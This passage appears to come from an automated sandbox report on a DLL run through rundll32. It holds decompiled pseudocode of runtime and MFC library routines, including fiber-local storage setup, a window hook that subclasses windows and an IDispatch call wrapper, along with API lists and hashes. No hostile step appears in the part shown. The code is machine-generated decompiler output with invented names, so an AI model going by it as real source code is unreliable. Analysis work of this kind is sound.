                                                                                                                          								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
                                                                                                                          								__eflags = _t21 - 0xffffffff;
                                                                                                                          								 *0x100547c4 = _t21;
                                                                                                                          								if(_t21 == 0xffffffff) {
                                                                                                                          									goto L14;
                                                                                                                          								} else {
                                                                                                                          									_t43 = E10035840(1, 0x214);
                                                                                                                          									__eflags = _t43;
                                                                                                                          									if(_t43 == 0) {
                                                                                                                          										goto L14;
                                                                                                                          									} else {
                                                                                                                          										_push(_t43);
                                                                                                                          										_push( *0x100547c4);
                                                                                                                          										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											goto L14;
                                                                                                                          										} else {
                                                                                                                          											_push(0);
                                                                                                                          											_push(_t43);
                                                                                                                          											E100351B5(_t30, _t37, _t38, _t43, __eflags);
                                                                                                                          											_t26 = GetCurrentThreadId();
                                                                                                                          											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                                                                                          											 *_t43 = _t26;
                                                                                                                          											_t11 = 1;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t11;
                                                                                                                          				} else {
                                                                                                                          					E10035178(_t37);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          			}

















                                                                                                                          0x10035548
                                                                                                                          0x1003554a
                                                                                                                          0x1003554c
                                                                                                                          0x00000000
                                                                                                                          0x10035552
                                                                                                                          0x10035552
                                                                                                                          0x10035568
                                                                                                                          0x10035578
                                                                                                                          0x10035588
                                                                                                                          0x10035595
                                                                                                                          0x1003559a
                                                                                                                          0x1003559f
                                                                                                                          0x100355a1
                                                                                                                          0x10035608
                                                                                                                          0x10035608
                                                                                                                          0x00000000
                                                                                                                          0x100355a3
                                                                                                                          0x100355a3
                                                                                                                          0x100355b4
                                                                                                                          0x100355b6
                                                                                                                          0x100355b9
                                                                                                                          0x100355be
                                                                                                                          0x00000000
                                                                                                                          0x100355c0
                                                                                                                          0x100355cc
                                                                                                                          0x100355ce
                                                                                                                          0x100355d2
                                                                                                                          0x00000000
                                                                                                                          0x100355d4
                                                                                                                          0x100355d4
                                                                                                                          0x100355d5
                                                                                                                          0x100355e9
                                                                                                                          0x100355eb
                                                                                                                          0x00000000
                                                                                                                          0x100355ed
                                                                                                                          0x100355ed
                                                                                                                          0x100355ef
                                                                                                                          0x100355f0
                                                                                                                          0x100355f7
                                                                                                                          0x100355fd
                                                                                                                          0x10035601
                                                                                                                          0x10035605
                                                                                                                          0x10035605
                                                                                                                          0x100355eb
                                                                                                                          0x100355d2
                                                                                                                          0x100355be
                                                                                                                          0x100355a1
                                                                                                                          0x1003554c
                                                                                                                          0x10035611
                                                                                                                          0x100354a0
                                                                                                                          0x100354a0
                                                                                                                          0x100354a8
                                                                                                                          0x100354a8

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                          • __mtterm.LIBCMT ref: 100354A0
                                                                                                                            • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                            • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                            • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                            • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                          • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                          • __init_pointers.LIBCMT ref: 10035552
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                          • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                          • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                          • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                          • API String ID: 4287529916-3819984048
                                                                                                                          • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                          • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                          • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                          • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				void* _t55;
                                                                                                                          				signed int _t56;
                                                                                                                          				void* _t59;
                                                                                                                          				long _t60;
                                                                                                                          				signed int _t64;
                                                                                                                          				void* _t66;
                                                                                                                          				short _t72;
                                                                                                                          				signed int _t74;
                                                                                                                          				signed int _t76;
                                                                                                                          				long _t83;
                                                                                                                          				signed int _t86;
                                                                                                                          				signed short _t87;
                                                                                                                          				signed int _t88;
                                                                                                                          				int _t94;
                                                                                                                          				void* _t107;
                                                                                                                          				long* _t109;
                                                                                                                          				long _t111;
                                                                                                                          				signed int _t112;
                                                                                                                          				CHAR* _t113;
                                                                                                                          				intOrPtr _t114;
                                                                                                                          				void* _t117;
                                                                                                                          				void* _t120;
                                                                                                                          				intOrPtr _t121;
                                                                                                                          
                                                                                                                          				_t120 = __eflags;
                                                                                                                          				_t106 = __edi;
                                                                                                                          				_push(0x148);
                                                                                                                          				E10030D90(E1004429C, __ebx, __edi, __esi);
                                                                                                                          				_t111 =  *(_t117 + 0x10);
                                                                                                                          				_t94 =  *(_t117 + 0xc);
                                                                                                                          				_push(E10015B30);
                                                                                                                          				 *(_t117 - 0x120) = _t111;
                                                                                                                          				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
                                                                                                                          				_t121 = _t54;
                                                                                                                          				_t97 = 0 | _t121 == 0x00000000;
                                                                                                                          				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
                                                                                                                          				if(_t121 == 0) {
                                                                                                                          					_t54 = E100201F1(_t97);
                                                                                                                          				}
                                                                                                                          				if( *(_t117 + 8) == 3) {
                                                                                                                          					_t107 =  *_t111;
                                                                                                                          					_t112 =  *(_t54 + 0x14);
                                                                                                                          					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
                                                                                                                          					__eflags = _t112;
                                                                                                                          					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                          					 *(_t117 - 0x124) = _t56;
                                                                                                                          					if(_t112 != 0) {
                                                                                                                          						L7:
                                                                                                                          						__eflags =  *0x10057854;
                                                                                                                          						if( *0x10057854 == 0) {
                                                                                                                          							L12:
                                                                                                                          							__eflags = _t112;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								__eflags =  *0x10057454;
                                                                                                                          								if( *0x10057454 != 0) {
                                                                                                                          									L19:
                                                                                                                          									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										L23:
                                                                                                                          										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                          										__eflags = _t59;
                                                                                                                          										 *(_t117 - 0x14) = _t59;
                                                                                                                          										if(_t59 != 0) {
                                                                                                                          											_t113 = "AfxOldWndProc423";
                                                                                                                          											_t64 = GetPropA(_t94, _t113);
                                                                                                                          											__eflags = _t64;
                                                                                                                          											if(_t64 == 0) {
                                                                                                                          												SetPropA(_t94, _t113,  *(_t117 - 0x14));
                                                                                                                          												_t66 = GetPropA(_t94, _t113);
                                                                                                                          												__eflags = _t66 -  *(_t117 - 0x14);
                                                                                                                          												if(_t66 ==  *(_t117 - 0x14)) {
                                                                                                                          													GlobalAddAtomA(_t113);
                                                                                                                          													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										L27:
                                                                                                                          										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
                                                                                                                          										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
                                                                                                                          										__eflags =  *(_t117 - 0x124);
                                                                                                                          										_t111 = _t60;
                                                                                                                          										if( *(_t117 - 0x124) != 0) {
                                                                                                                          											UnhookWindowsHookEx( *(_t106 + 0x28));
                                                                                                                          											_t50 = _t106 + 0x28;
                                                                                                                          											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
                                                                                                                          											__eflags =  *_t50;
                                                                                                                          										}
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          									goto L27;
                                                                                                                          								}
                                                                                                                          								_t114 = 0x30;
                                                                                                                          								E10030030(_t107, _t117 - 0x154, 0, _t114);
                                                                                                                          								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
                                                                                                                          								_push(_t117 - 0x154);
                                                                                                                          								_push("#32768");
                                                                                                                          								_push(0);
                                                                                                                          								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
                                                                                                                          								__eflags = _t72;
                                                                                                                          								 *0x10057454 = _t72;
                                                                                                                          								if(_t72 == 0) {
                                                                                                                          									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
                                                                                                                          									__eflags = _t74;
                                                                                                                          									if(_t74 == 0) {
                                                                                                                          										goto L23;
                                                                                                                          									}
                                                                                                                          									 *((char*)(_t117 - 0x19)) = 0;
                                                                                                                          									_t76 = E10032D2F(_t117 - 0x118, "#32768");
                                                                                                                          									__eflags = _t76;
                                                                                                                          									if(_t76 == 0) {
                                                                                                                          										goto L27;
                                                                                                                          									}
                                                                                                                          									goto L23;
                                                                                                                          								}
                                                                                                                          								goto L19;
                                                                                                                          							}
                                                                                                                          							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
                                                                                                                          							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
                                                                                                                          							E1001B083(_t112, _t117, _t94);
                                                                                                                          							 *((intOrPtr*)( *_t112 + 0x50))();
                                                                                                                          							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
                                                                                                                          							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
                                                                                                                          							__eflags = _t83 - E1001B780;
                                                                                                                          							if(_t83 != E1001B780) {
                                                                                                                          								 *_t109 = _t83;
                                                                                                                          							}
                                                                                                                          							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                          							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
                                                                                                                          							__eflags =  *(_t117 - 0x14);
                                                                                                                          							if( *(_t117 - 0x14) != 0) {
                                                                                                                          								_push( *(_t117 - 0x18));
                                                                                                                          								_push(0);
                                                                                                                          								E1001F30C();
                                                                                                                          							}
                                                                                                                          							goto L27;
                                                                                                                          						}
                                                                                                                          						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                          						__eflags = _t86 & 0x00010000;
                                                                                                                          						if((_t86 & 0x00010000) != 0) {
                                                                                                                          							goto L27;
                                                                                                                          						}
                                                                                                                          						_t87 =  *(_t107 + 0x28);
                                                                                                                          						__eflags = _t87 - 0xffff;
                                                                                                                          						if(_t87 <= 0xffff) {
                                                                                                                          							 *(_t117 - 0x18) = 0;
                                                                                                                          							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
                                                                                                                          							_t87 = _t117 - 0x18;
                                                                                                                          						}
                                                                                                                          						_t88 = E10014B55(_t87, "ime");
                                                                                                                          						__eflags = _t88;
                                                                                                                          						if(_t88 == 0) {
                                                                                                                          							goto L27;
                                                                                                                          						}
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					__eflags =  *(_t107 + 0x20) & 0x40000000;
                                                                                                                          					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
                                                                                                                          						goto L27;
                                                                                                                          					}
                                                                                                                          					__eflags = _t56;
                                                                                                                          					if(_t56 != 0) {
                                                                                                                          						goto L27;
                                                                                                                          					}
                                                                                                                          					goto L7;
                                                                                                                          				} else {
                                                                                                                          					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
                                                                                                                          					L30:
                                                                                                                          					return E10030E13(_t94, _t106, _t111);
                                                                                                                          				}
                                                                                                                          			}




























                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                            • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                          • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                          • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                          • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                          • _memset.LIBCMT ref: 1001CA70
                                                                                                                          • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                          • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                          • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                          • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                          • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                          • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                          • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                          • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                          • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                          • API String ID: 867647115-4034971020
                                                                                                                          • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                          • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                          • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                          • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				void* _t190;
                                                                                                                          				signed int _t194;
                                                                                                                          				intOrPtr* _t200;
                                                                                                                          				signed int _t203;
                                                                                                                          				signed int _t206;
                                                                                                                          				intOrPtr* _t208;
                                                                                                                          				intOrPtr _t211;
                                                                                                                          				char _t230;
                                                                                                                          				CHAR* _t236;
                                                                                                                          				intOrPtr _t237;
                                                                                                                          				signed short _t240;
                                                                                                                          				signed int _t241;
                                                                                                                          				signed int _t242;
                                                                                                                          				signed int _t250;
                                                                                                                          				signed int* _t257;
                                                                                                                          				signed int _t258;
                                                                                                                          				signed int _t277;
                                                                                                                          				signed short* _t278;
                                                                                                                          				signed short* _t279;
                                                                                                                          				signed int _t290;
                                                                                                                          				signed int _t291;
                                                                                                                          				intOrPtr* _t293;
                                                                                                                          				CHAR* _t295;
                                                                                                                          				intOrPtr* _t296;
                                                                                                                          				intOrPtr _t297;
                                                                                                                          				signed int** _t299;
                                                                                                                          				void* _t300;
                                                                                                                          				void* _t301;
                                                                                                                          				void* _t302;
                                                                                                                          				void* _t313;
                                                                                                                          
                                                                                                                          				_push(0x7c);
                                                                                                                          				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                                                                                          				_t257 = 0;
                                                                                                                          				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                                                          					L78:
                                                                                                                          					return E10030DFF(_t190);
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                                                                                          				 *(_t300 - 0x4c) = 0;
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                                                                                          				 *(_t300 - 4) = 0;
                                                                                                                          				E10030030(__edi, _t300 - 0x54, 0, 0x10);
                                                                                                                          				_t302 = _t301 + 0xc;
                                                                                                                          				if( *(_t300 + 0x18) != 0) {
                                                                                                                          					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                                                                                          				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                                                                                          					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                                                                                          					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                                                                                          				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                                                                                          				_t194 =  *(_t300 - 0x4c);
                                                                                                                          				_t308 = _t194 - _t257;
                                                                                                                          				 *(_t300 - 4) = 1;
                                                                                                                          				_t293 = 4;
                                                                                                                          				if(_t194 == _t257) {
                                                                                                                          					L37:
                                                                                                                          					_t295 = 0;
                                                                                                                          					E1002BDD9(_t300 - 0x44);
                                                                                                                          					if( *(_t300 + 0x10) != _t257) {
                                                                                                                          						_t295 = _t300 - 0x44;
                                                                                                                          					}
                                                                                                                          					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
                                                                                                                          					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                                                                                          					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                                                                                          					_t289 = _t300 - 0x54;
                                                                                                                          					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                                                                                          					E1002DAF2(_t300 - 0x68);
                                                                                                                          					_t203 =  *(_t300 - 0x4c);
                                                                                                                          					if(_t203 == _t257) {
                                                                                                                          						L46:
                                                                                                                          						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                          						E10014517(_t257, _t289, _t293, _t295, _t319);
                                                                                                                          						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                                                                                          						if( *(_t300 + 0xc) >= _t257) {
                                                                                                                          							L61:
                                                                                                                          							_t295 =  *(_t300 + 0x10);
                                                                                                                          							if(_t295 == _t257) {
                                                                                                                          								L76:
                                                                                                                          								 *(_t300 - 4) = 0;
                                                                                                                          								_t190 = E1002CDE9(_t300 - 0x68, _t289);
                                                                                                                          								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                                                                                          								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                          									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
                                                                                                                          								}
                                                                                                                          								goto L78;
                                                                                                                          							}
                                                                                                                          							if(_t295 == 0xc) {
                                                                                                                          								L65:
                                                                                                                          								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                                                                                          								__eflags = _t206 - 0x13;
                                                                                                                          								if(_t206 > 0x13) {
                                                                                                                          									goto L76;
                                                                                                                          								}
                                                                                                                          								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
                                                                                                                          									case 0:
                                                                                                                          										__eax =  *(__ebp + 0x14);
                                                                                                                          										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                          										goto L76;
                                                                                                                          									case 1:
                                                                                                                          										__eax =  *(__ebp + 0x14);
                                                                                                                          										__ecx =  *(__ebp - 0x3c);
                                                                                                                          										 *( *(__ebp + 0x14)) = __ecx;
                                                                                                                          										goto L76;
                                                                                                                          									case 2:
                                                                                                                          										__eax =  *(__ebp + 0x14);
                                                                                                                          										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                          										goto L76;
                                                                                                                          									case 3:
                                                                                                                          										__eax =  *(__ebp + 0x14);
                                                                                                                          										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                          										goto L76;
                                                                                                                          									case 4:
                                                                                                                          										__ecx =  *(__ebp - 0x3c);
                                                                                                                          										__eax =  *(__ebp + 0x14);
                                                                                                                          										 *__eax =  *(__ebp - 0x3c);
                                                                                                                          										__ecx =  *(__ebp - 0x38);
                                                                                                                          										 *(__eax + 4) = __ecx;
                                                                                                                          										goto L76;
                                                                                                                          									case 5:
                                                                                                                          										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                                                                                          										_push( *(__ebp - 0x3c));
                                                                                                                          										__imp__#6();
                                                                                                                          										goto L76;
                                                                                                                          									case 6:
                                                                                                                          										__ecx =  *(__ebp + 0x14);
                                                                                                                          										__eax = 0;
                                                                                                                          										__eflags =  *(__ebp - 0x3c) - __bx;
                                                                                                                          										__eax = 0 | __eflags != 0x00000000;
                                                                                                                          										 *__ecx = __eflags != 0;
                                                                                                                          										goto L76;
                                                                                                                          									case 7:
                                                                                                                          										__edi =  *(__ebp + 0x14);
                                                                                                                          										__esi = __ebp - 0x44;
                                                                                                                          										asm("movsd");
                                                                                                                          										asm("movsd");
                                                                                                                          										asm("movsd");
                                                                                                                          										asm("movsd");
                                                                                                                          										__ebx = 0;
                                                                                                                          										goto L76;
                                                                                                                          									case 8:
                                                                                                                          										goto L76;
                                                                                                                          									case 9:
                                                                                                                          										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                                                                                          										goto L76;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t208 = _t300 - 0x44;
                                                                                                                          							__imp__#12(_t208, _t208, _t257, _t295);
                                                                                                                          							_t293 = _t208;
                                                                                                                          							_t321 = _t293 - _t257;
                                                                                                                          							if(_t293 >= _t257) {
                                                                                                                          								goto L65;
                                                                                                                          							}
                                                                                                                          							__imp__#9(_t300 - 0x44);
                                                                                                                          							_push(_t293);
                                                                                                                          							L49:
                                                                                                                          							E1001FCED(_t257, _t293, _t295, _t321);
                                                                                                                          							L50:
                                                                                                                          							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                                                                                          							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                                                                                          								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                                                                                          							}
                                                                                                                          							_t211 = E100144EC(_t322, 0x20);
                                                                                                                          							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                                                                                          							_t323 = _t211 - _t257;
                                                                                                                          							 *(_t300 - 4) = 4;
                                                                                                                          							if(_t211 != _t257) {
                                                                                                                          								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                                                                                          								_push(_t257);
                                                                                                                          								_push(_t257);
                                                                                                                          								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
                                                                                                                          							}
                                                                                                                          							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                          							_t293 = __imp__#7;
                                                                                                                          							 *(_t300 - 4) = 1;
                                                                                                                          							if( *_t293() != 0) {
                                                                                                                          								_t139 = _t257 + 0x18; // 0x18
                                                                                                                          								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                          							}
                                                                                                                          							_t296 = __imp__#6;
                                                                                                                          							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                          							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                          							if( *_t293() != 0) {
                                                                                                                          								_t143 = _t257 + 0xc; // 0xc
                                                                                                                          								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                          							}
                                                                                                                          							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                          							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                          							if( *_t293() != 0) {
                                                                                                                          								_t147 = _t257 + 0x14; // 0x14
                                                                                                                          								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                          							}
                                                                                                                          							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                          							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                                                                                          							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                                                                                          							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                                                                                          							E10033135(_t300 + 0x14, 0x100505f8);
                                                                                                                          							goto L61;
                                                                                                                          						}
                                                                                                                          						__imp__#9(_t300 - 0x44);
                                                                                                                          						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                                                                                          						if( *(_t300 + 0xc) == 0x80020009) {
                                                                                                                          							goto L50;
                                                                                                                          						}
                                                                                                                          						_push( *(_t300 + 0xc));
                                                                                                                          						goto L49;
                                                                                                                          					} else {
                                                                                                                          						_t295 =  *(_t300 + 0x18);
